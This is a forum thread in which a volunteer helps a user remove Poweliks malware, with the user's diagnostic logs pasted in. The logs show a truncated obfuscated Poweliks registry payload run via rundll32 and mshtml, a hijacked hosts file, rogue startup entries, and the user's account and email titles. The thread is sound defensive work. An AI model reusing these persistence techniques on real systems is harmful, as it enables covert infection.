Infected with Poweliks malware.


  • This topic is locked
38 replies to this topic

#1 Bobbie S.

Bobbie S.

  • Members
  • 38 posts
  • OFFLINE
  •  
  • Local time:11:52 AM

Posted 30 October 2014 - 08:38 PM

I have gone through various processes to get rid of COM Surrogate issues.

The thread appears here: http://www.bleepingcomputer.com/forums/t/553280/possible-infection-com-surrogate/

MBAR says the computer is infected with Poweliks malware.

I have run DDS.com and here are the results of the Attach.txt. The DDS.txt file did not appear though.

.

UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft Windows 7 Professional 
Boot Device: \Device\HarddiskVolume1
Install Date: 11/25/2013 11:49:52 AM
System Uptime: 10/30/2014 9:02:14 PM (0 hours ago)
.
Motherboard: Dell Inc.           |  | 0HP962
Processor: Intel® Core™2 CPU          6300  @ 1.86GHz | Microprocessor | 1862/1066mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 698 GiB total, 655.755 GiB free.
D: is CDROM (CDFS)
.
==== Disabled Device Manager Items =============
.
Class GUID: {4d36e972-e325-11ce-bfc1-08002be10318}
Description: Microsoft Teredo Tunneling Adapter
Device ID: ROOT\*TEREDO\0000
Manufacturer: Microsoft
Name: Teredo Tunneling Pseudo-Interface
PNP Device ID: ROOT\*TEREDO\0000
Service: tunnel
.
==== Image File Execution Options =============
.
.
==== Installed Programs ======================
.
.
==== End Of File ===========================
 
Additional info:
Just now, MS Security Essentials found and cleaned the following:
Dates seem to go back a few days though.
 
Behavior:Win32/Zemot.gen!A
PWS:Win32/Zbot.gen!plock  (two instances)
PWS:Win32/Zbot  (MANY instances)
TrojanDownloader:Win32/Notodar
Ransom:Win32/Crowti.A  (two instances)
Virus:DOS/Rovnix.W
Virus:Win32/Rovnix.gen!c
Exploit:JS/CVE-2013-2551.C  (these are found every few minutes)
 

 




 


#2 Bobbie S.


Posted 04 November 2014 - 07:57 AM

Is this computer hopeless? I followed instructions up to the point where I was told to continue the post with a new topic in this location.

I did that, but have received no responses.

If reformatting is suggested, please advise.

Bobbie2836



#3 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:05:52 PM

Posted 04 November 2014 - 05:13 PM

Hi & welcome to Bleeping Computer Forums!
My name is Jürgen and I will be assisting you with your malware-related problems.

Before we move on, please read the following points carefully:
  • My native language isn't English. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.
  • Please read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
  • Perform everything in the correct order. Sometimes one step requires the previous one.
  • If you have any problems while you are following my instructions, stop there and tell me the exact nature of your problem.
  • Do not run any other scans without instruction or Add/ Remove Software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
  • Post all Logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
  • If I don't hear from you within 5 days from this initial or any subsequent post, then this thread will be closed.
  • If I don't reply within 24 hours please PM me!
  • Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.
Step 1
Please download Powelikscleaner (by ESET) and save it to your Desktop.
  • Double-click the icon to start the tool.
  • Read the terms of the End-user license agreement and click Agree if you agree to them.
  • The tool will run automatically. If the cleaner finds a Poweliks infection, press the Y key on your keyboard to remove it.
  • If Poweliks was detected, "Win32/Poweliks was successfully removed from your system" will be displayed. Press any key to exit the tool and reboot your PC.
  • The tool will produce a log in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.

Step 2

Please run a FRST scan. This will help us diagnose your problem.

Please download Farbar Recovery Scan Tool and save it to your Desktop.
(If you are not sure which version (32-/64-bit) applies to your system, download and try to start both of them as just the right one will run.)
  • Start FRST with administrator privileges.
  • Make sure the option Addition.txt is checked and press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
  • Please copy and paste these logs in your next reply.

regards,
deeprybka
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 

#4 deeprybka


Posted 07 November 2014 - 03:18 PM

Hi,

3 Day Inactivity

This is the third day since my last post. Are you still there?

If you need more time, just let me know.

If you do not post within 48 hours, this thread will be closed due to inactivity.


regards,
deeprybka

#5 Bobbie S.


Posted 07 November 2014 - 08:42 PM

I'll be on that infected computer tomorrow, and will send the FRST & Addition texts then.

Thank you so much.

Bobbie



#6 deeprybka


Posted 08 November 2014 - 06:27 AM

OK... :)

Thanks for letting me know.
regards,
deeprybka

#7 Bobbie S.


Posted 08 November 2014 - 12:48 PM

Here are the Addition.txt and Frst.txt contents.

Also, IE security settings won't hold on "default level"

Bobbie

*****************

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 08-11-2014 01
Ran by Jack at 2014-11-08 12:44:49
Running from C:\Users\Jack\Downloads
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Enabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.07) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.07 - Adobe Systems Incorporated)
Auslogics DiskDefrag (HKLM\...\{DF6A13C0-77DF-41FE-BD05-6D5201EB0CE7}_is1) (Version: 4.5.4.0 - Auslogics Labs Pty Ltd)
CCleaner (HKLM\...\CCleaner) (Version: 4.19 - Piriform)
CutePDF Writer 3.0 (HKLM\...\CutePDF Writer Installation) (Version:  3.0 - CutePDF.com)
Dropbox (HKCU\...\Dropbox) (Version: 2.10.30 - Dropbox, Inc.)
Glary Utilities 5.10 (HKLM\...\Glary Utilities 5) (Version: 5.10.0.17 - Glarysoft Ltd)
Google Chrome (HKLM\...\{51020C27-7422-3FBE-9480-4CB1CCC8E2CC}) (Version: 65.156.32827 - Google, Inc.)
Google Update Helper (Version: 1.3.24.15 - Google Inc.) Hidden
HP Deskjet 1510 series Basic Device Software (HKLM\...\{C821234A-3642-493B-95AF-46F776392E20}) (Version: 32.0.1180.44630 - Hewlett-Packard Co.)
HP Deskjet 1510 series Help (HKLM\...\{2E25FCEB-EFCB-4696-AA01-D3CBAC721831}) (Version: 30.0.0 - Hewlett Packard)
HP FWUpdateEDO2 (HKLM\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard)
HP Photo Creations (HKLM\...\HP Photo Creations) (Version: 1.0.0.7702 - HP)
HP Support Solutions Framework (HKLM\...\{86FD8326-909D-45F5-BB61-0619D0D31293}) (Version: 11.50.0011 - Hewlett-Packard Company)
HP Update (HKLM\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPDiagnosticAlert (Version: 1.00.0001 - Microsoft) Hidden
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1930 - Intel Corporation)
Java 7 Update 60 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F03217060FF}) (Version: 7.0.600 - Oracle)
LibreOffice 4.1.3.2 (HKLM\...\{4F3722AD-197D-4DBB-BDFB-D2F0D6776354}) (Version: 4.1.3.2 - The Document Foundation)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Product Improvement Study for HP Deskjet 1510 series (HKLM\...\{40147F4F-B73E-4C87-A3D3-8BD36F7C77F0}) (Version: 32.0.1180.44630 - Hewlett-Packard Co.)
SoundMAX (HKLM\...\{F0A37341-D692-11D4-A984-009027EC0A9C}) (Version: 6.10.1.7265 - Analog Devices)
TeamViewer 9 (HKLM\...\TeamViewer 9) (Version: 9.0.32494 - TeamViewer)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-2108881583-117912961-3019965817-1000_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Jack\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2108881583-117912961-3019965817-1000_Classes\CLSID\{49BBAA3C-C574-419E-8378-783C362E9C15}\InprocServer32 -> C:\Program Files\HP\Common\FWUpdateEDO2.dll (Hewlett-Packard Co.)
CustomCLSID: HKU\S-1-5-21-2108881583-117912961-3019965817-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-2108881583-117912961-3019965817-1000_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2108881583-117912961-3019965817-1000_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2108881583-117912961-3019965817-1000_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2108881583-117912961-3019965817-1000_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2108881583-117912961-3019965817-1000_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2108881583-117912961-3019965817-1000_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2108881583-117912961-3019965817-1000_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2108881583-117912961-3019965817-1000_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)

==================== Restore Points  =========================

02-11-2014 16:52:30 Scheduled Checkpoint

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:04 - 2014-11-05 16:38 - 00001497 _RASH C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
146.0.75.27 www.google-analytics.com.
146.0.75.27 google-analytics.com.
146.0.75.27 connect.facebook.net.
107.181.187.40 www.google-analytics.com.
107.181.187.40 google-analytics.com.
107.181.187.40 connect.facebook.net.
85.17.81.55 www.google-analytics.com.
85.17.81.55 google-analytics.com.
85.17.81.55 connect.facebook.net.

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {1AD2C709-B5BE-4B77-9BEA-6B42066C6A94} - System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan => d:\program files\windows defender\MpCmdRun.exe
Task: {1E3691DB-94B1-4C25-AD77-3875AAA91D45} - \TidyNetwork Update No Task File <==== ATTENTION
Task: {2A10788F-315A-4881-9817-A822B4C1CAAB} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2013-11-25] (Google Inc.)
Task: {2D6DFA23-1DF1-4478-A25D-CB3DE9434A6F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-10-23] (Piriform Ltd)
Task: {3ED50F48-3894-4651-9343-2DF04AA0CB8E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2013-11-25] (Google Inc.)
Task: {3FB7FEEF-04CB-4457-BE54-9BD34286F8A0} - System32\Tasks\{CFE9EF51-B708-8BEB-C2A3-4F5658BA669F} => C:\Windows\system32\rqzan.dll/s "C:\Windows\system32\rqzan.dll"
Task: {412C8FCE-7375-4451-8270-DBBDFD519E91} - \Security Center Update - 1236605613 No Task File <==== ATTENTION
Task: {4227ED40-F378-45B8-829F-FC479D3AFBEE} - \TheBestDeals Update No Task File <==== ATTENTION
Task: {42CC36AA-BAFC-4898-8AA8-78188575BF56} - System32\Tasks\HPCustParticipation HP Deskjet 1510 series => C:\Program Files\HP\HP Deskjet 1510 series\Bin\HPCustPartic.exe [2013-08-13] (Hewlett-Packard Co.)
Task: {98C53881-CBEF-4557-A773-4342C60DDED2} - System32\Tasks\HP AR Program Upload - 1665a69506154377aebded6d3321133697bfb85f401e4da8b79d5bea55e71083 => C:\Program Files\HP\HP Deskjet 1510 series\bin\HPRewards.exe [2013-08-13] (TODO: <Company name>)
Task: {A93480F7-E588-4B0C-9169-0A32F8C015AE} - \Security Center Update - 2482164111 No Task File <==== ATTENTION
Task: {F3CFC8A3-717F-4429-832B-7D408BE0A753} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-23] (Adobe Systems Incorporated)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GlaryInitialize 5.job => C:\Program Files\Glary Utilities 5\Initialize.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2014-02-20 20:01 - 2013-10-23 15:23 - 00089136 _____ () C:\Windows\System32\cpwmon2k.dll
2014-11-07 21:02 - 2014-11-07 21:02 - 00325166 ___SH () C:\Windows\Installer\{F9005E4A-3F66-4B93-9604-53209B03D6F7}\msiexec.exe
2014-11-07 21:02 - 2014-11-07 21:02 - 00023552 _____ () C:\Users\Jack\AppData\Local\acikmao.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:373E1720
AlternateDataStreams: C:\Users\Jack\Documents\Fw_ Criminal Complaint Filed vs_ Obama due to Latest _Birth Certificate_ Being a Forgery.eml:OECustomProperty
AlternateDataStreams: C:\Users\Jack\Documents\Fw_ Does ultimatum mean Iran will invade Saudi Arabia_.eml:OECustomProperty
AlternateDataStreams: C:\Users\Jack\Documents\Fw_ Does Ultrimatum mean Iran will invade.eml:OECustomProperty
AlternateDataStreams: C:\Users\Jack\Documents\Fw_ Great News_  DeMint Mulls 2012 Bid.eml:OECustomProperty
AlternateDataStreams: C:\Users\Jack\Documents\The Answer to Your Prayers is Here for those who believe.eml:OECustomProperty
AlternateDataStreams: C:\Users\Jack\Documents\Veteran's Counseling Program.eml:OECustomProperty

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\startupfolder: C:^Users^Jack^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dropbox.lnk => C:\Windows\pss\Dropbox.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Jack^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Monitor Ink Alerts - HP Deskjet 1510 series.lnk => C:\Windows\pss\Monitor Ink Alerts - HP Deskjet 1510 series.lnk.Startup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: BManager => C:\Program Files\Browser Features\BManager.exe
MSCONFIG\startupreg: Browser Features => C:\Program Files\Browser Features\BManager.exe
MSCONFIG\startupreg: HotKeysCmds => C:\Windows\system32\hkcmd.exe
MSCONFIG\startupreg: HP Software Update => C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
MSCONFIG\startupreg: MSMPENG => C:\Users\Jack\AppData\Roaming\svc-umwl.exe
MSCONFIG\startupreg: Skgrfuuzzc => regsvr32.exe /s "C:\Users\Jack\AppData\Local\Programs\Skgrfuuzzc.dll"
MSCONFIG\startupreg: SoundMAXPnP => C:\Program Files\Analog Devices\Core\smax4pnp.exe
MSCONFIG\startupreg: SpUninstallCleanUp => REG delete HKEY_LOCAL_MACHINE\Software\SearchProtect /f
MSCONFIG\startupreg: Windows X64 Service Manager => C:\Program Files\FlashNow Updater\flsysio.exe

========================= Accounts: ==========================

Administrator (S-1-5-21-2108881583-117912961-3019965817-500 - Administrator - Disabled)
Guest (S-1-5-21-2108881583-117912961-3019965817-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2108881583-117912961-3019965817-1002 - Limited - Enabled)
Jack (S-1-5-21-2108881583-117912961-3019965817-1000 - Administrator - Enabled) => C:\Users\Jack

==================== Faulty Device Manager Devices =============

Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

==================== Event log errors: =========================

Application errors:
==================
Error: (11/08/2014 11:27:28 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x541b6f63
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x06cd0892
Faulting process id: 0xdcc
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/07/2014 09:03:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: wjetifgd.exe, version: 3.0.0.2, time stamp: 0x544a8070
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00005b30
Faulting process id: 0x24c8
Faulting application start time: 0xwjetifgd.exe0
Faulting application path: wjetifgd.exe1
Faulting module path: wjetifgd.exe2
Report Id: wjetifgd.exe3

Error: (11/07/2014 09:03:44 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: UpdateFlashPlayer_e32eb32e.exe, version: 1.0.0.1002, time stamp: 0x539d7a76
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00004542
Faulting process id: 0xa38
Faulting application start time: 0xUpdateFlashPlayer_e32eb32e.exe0
Faulting application path: UpdateFlashPlayer_e32eb32e.exe1
Faulting module path: UpdateFlashPlayer_e32eb32e.exe2
Report Id: UpdateFlashPlayer_e32eb32e.exe3

Error: (11/07/2014 09:03:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: UpdateFlashPlayer_7accf934.exe, version: 1.0.0.1002, time stamp: 0x539d7a76
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00004542
Faulting process id: 0x37dc
Faulting application start time: 0xUpdateFlashPlayer_7accf934.exe0
Faulting application path: UpdateFlashPlayer_7accf934.exe1
Faulting module path: UpdateFlashPlayer_7accf934.exe2
Report Id: UpdateFlashPlayer_7accf934.exe3

Error: (11/07/2014 09:03:22 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: msiexec.exe, version: 3.8.0.2, time stamp: 0x545c8b63
Faulting module name: msiexec.exe, version: 3.8.0.2, time stamp: 0x545c8b63
Exception code: 0xc0000005
Fault offset: 0x000012df
Faulting process id: 0x21c0
Faulting application start time: 0xmsiexec.exe0
Faulting application path: msiexec.exe1
Faulting module path: msiexec.exe2
Report Id: msiexec.exe3

Error: (11/07/2014 09:03:22 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: msiexec.exe, version: 1.0.0.1002, time stamp: 0x545d1e98
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00020919
Faulting process id: 0x1894
Faulting application start time: 0xmsiexec.exe0
Faulting application path: msiexec.exe1
Faulting module path: msiexec.exe2
Report Id: msiexec.exe3

Error: (11/07/2014 09:03:22 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: msiexec.exe, version: 3.8.0.2, time stamp: 0x545c8b63
Faulting module name: msiexec.exe, version: 3.8.0.2, time stamp: 0x545c8b63
Exception code: 0xc0000005
Fault offset: 0x000012df
Faulting process id: 0x2614
Faulting application start time: 0xmsiexec.exe0
Faulting application path: msiexec.exe1
Faulting module path: msiexec.exe2
Report Id: msiexec.exe3

Error: (11/07/2014 04:45:16 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/07/2014 01:21:54 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x541b6f63
Faulting module name: igdumd32.dll, version: 8.14.10.1930, time stamp: 0x4aba746b
Exception code: 0xc0000005
Fault offset: 0x00004ff8
Faulting process id: 0x1c88
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/06/2014 07:09:24 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

System errors:
=============
Error: (11/08/2014 00:44:24 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/08/2014 11:00:45 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/08/2014 11:00:25 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/08/2014 10:59:56 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/08/2014 08:53:39 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

 New Signature Version:

 Previous Signature Version: 1.187.1511.0

 Update Source: %NT AUTHORITY59

 Update Stage: 4.6.0305.00

 Source Path: 4.6.0305.01

 Signature Type: %NT AUTHORITY602

 Update Type: %NT AUTHORITY604

 User: NT AUTHORITY\SYSTEM

 Current Engine Version: %NT AUTHORITY605

 Previous Engine Version: %NT AUTHORITY606

 Error code: %NT AUTHORITY607

 Error description: %NT AUTHORITY608

Error: (11/08/2014 04:56:34 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

 New Signature Version:

 Previous Signature Version: 1.187.1511.0

 Update Source: %NT AUTHORITY59

 Update Stage: 4.6.0305.00

 Source Path: 4.6.0305.01

 Signature Type: %NT AUTHORITY602

 Update Type: %NT AUTHORITY604

 User: NT AUTHORITY\SYSTEM

 Current Engine Version: %NT AUTHORITY605

 Previous Engine Version: %NT AUTHORITY606

 Error code: %NT AUTHORITY607

 Error description: %NT AUTHORITY608

Error: (11/08/2014 04:53:40 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

 New Signature Version:

 Previous Signature Version: 1.187.1511.0

 Update Source: %NT AUTHORITY59

 Update Stage: 4.6.0305.00

 Source Path: 4.6.0305.01

 Signature Type: %NT AUTHORITY602

 Update Type: %NT AUTHORITY604

 User: NT AUTHORITY\SYSTEM

 Current Engine Version: %NT AUTHORITY605

 Previous Engine Version: %NT AUTHORITY606

 Error code: %NT AUTHORITY607

 Error description: %NT AUTHORITY608

Error: (11/08/2014 01:33:41 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

 New Signature Version:

 Previous Signature Version: 1.187.1511.0

 Update Source: %NT AUTHORITY59

 Update Stage: 4.6.0305.00

 Source Path: 4.6.0305.01

 Signature Type: %NT AUTHORITY602

 Update Type: %NT AUTHORITY604

 User: NT AUTHORITY\SYSTEM

 Current Engine Version: %NT AUTHORITY605

 Previous Engine Version: %NT AUTHORITY606

 Error code: %NT AUTHORITY607

 Error description: %NT AUTHORITY608

Error: (11/08/2014 00:53:37 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

 New Signature Version:

 Previous Signature Version: 1.187.1511.0

 Update Source: %NT AUTHORITY59

 Update Stage: 4.6.0305.00

 Source Path: 4.6.0305.01

 Signature Type: %NT AUTHORITY602

 Update Type: %NT AUTHORITY604

 User: NT AUTHORITY\SYSTEM

 Current Engine Version: %NT AUTHORITY605

 Previous Engine Version: %NT AUTHORITY606

 Error code: %NT AUTHORITY607

 Error description: %NT AUTHORITY608

Error: (11/07/2014 08:53:37 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

 New Signature Version:

 Previous Signature Version: 1.187.1511.0

 Update Source: %NT AUTHORITY59

 Update Stage: 4.6.0305.00

 Source Path: 4.6.0305.01

 Signature Type: %NT AUTHORITY602

 Update Type: %NT AUTHORITY604

 User: NT AUTHORITY\SYSTEM

 Current Engine Version: %NT AUTHORITY605

 Previous Engine Version: %NT AUTHORITY606

 Error code: %NT AUTHORITY607

 Error description: %NT AUTHORITY608

Microsoft Office Sessions:
=========================
Error: (11/08/2014 11:27:28 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.17344541b6f63unknown0.0.0.000000000c000000506cd0892dcc01cffafd7aa0cdc3C:\Program Files\Internet Explorer\iexplore.exeunknown20f437f6-6764-11e4-9459-001e4f99a790

Error: (11/07/2014 09:03:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: wjetifgd.exe3.0.0.2544a8070unknown0.0.0.000000000c000000500005b3024c801cffaf83b36f9d4C:\Users\Jack\AppData\Local\Temp\wjetifgd.exeunknown7a140282-66eb-11e4-9459-001e4f99a790

Error: (11/07/2014 09:03:44 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: UpdateFlashPlayer_e32eb32e.exe1.0.0.1002539d7a76unknown0.0.0.000000000c000000500004542a3801cffaf837e06f50C:\Users\Jack\AppData\Local\Temp\UpdateFlashPlayer_e32eb32e.exeunknown77465910-66eb-11e4-9459-001e4f99a790

Error: (11/07/2014 09:03:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: UpdateFlashPlayer_7accf934.exe1.0.0.1002539d7a76unknown0.0.0.000000000c00000050000454237dc01cffaf82be7882aC:\Users\Jack\AppData\Local\Temp\UpdateFlashPlayer_7accf934.exeunknown6ba61a86-66eb-11e4-9459-001e4f99a790

Error: (11/07/2014 09:03:22 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: msiexec.exe3.8.0.2545c8b63msiexec.exe3.8.0.2545c8b63c0000005000012df21c001cffaf8291c02b9C:\Windows\Installer\{5614A1ED-47E3-4A6C-B1D0-6AC0FAD1B844}\msiexec.exeC:\Windows\Installer\{5614A1ED-47E3-4A6C-B1D0-6AC0FAD1B844}\msiexec.exe6a05f8fe-66eb-11e4-9459-001e4f99a790

Error: (11/07/2014 09:03:22 PM) (Source: Application Error) (EventID: 1000) (User: )
